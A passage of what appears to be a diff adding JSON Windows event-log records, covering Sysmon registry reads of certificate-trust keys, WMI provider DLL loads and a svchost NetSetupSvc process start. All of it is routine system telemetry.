"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "devobj.dll", + "image_path": "C:\\Windows\\System32\\devobj.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + 
"timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupApi.dll", + "image_path": "C:\\Windows\\System32\\NetSetupApi.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573792290000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573792610000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573792610000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573793230000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", 
+ "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 
131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "NetSetupEngine.dll", + "image_path": "C:\\Windows\\System32\\NetSetupEngine.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573793230000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573793390000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "command_line": "C:\\WINDOWS\\System32\\svchost.exe -k netsvcs -p -s NetSetupSvc", + "event_type": "process", + "logon_id": 999, + "parent_process_name": "services.exe", + "parent_process_path": "C:\\Windows\\System32\\services.exe", + "pid": 1332, + "ppid": 568, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "subtype": "create", + "timestamp": 131883573793580000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}", + "unique_ppid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "image_load", + "image_name": "svchost.exe", + "image_path": "C:\\Windows\\System32\\svchost.exe", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": 
"{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\System32\\sechost.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\System32\\ucrtbase.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\System32\\combase.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793550000, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + 
{ + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\System32\\win32u.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\System32\\gdi32.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\System32\\gdi32full.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp_win.dll", + "pid": 1332, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573793700016, + "unique_pid": "{42FC7E13-CC03-5C05-0000-001097AE5601}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": 
